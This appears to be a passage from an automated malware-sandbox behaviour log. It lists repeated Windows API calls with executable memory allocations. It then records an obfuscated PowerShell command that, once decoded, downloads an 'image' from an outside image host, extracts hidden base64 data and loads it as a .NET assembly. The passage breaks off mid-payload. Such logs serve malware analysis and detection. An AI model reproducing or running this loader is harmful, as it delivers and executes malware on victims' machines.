crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a3cf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a43f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a43f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a43f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a3ab8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a3ab8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a3ab8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a3ab8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a3ab8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006a3ab8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 393216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02460000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02480000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2164
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2164
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02481000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02482000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02523000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02524000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02542000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02595000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02526000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02543000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02544000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02545000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02546000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02548000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02549000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a35000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a36000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a37000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a39000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a3a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a3b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a3c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a3d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a3e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a3f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçB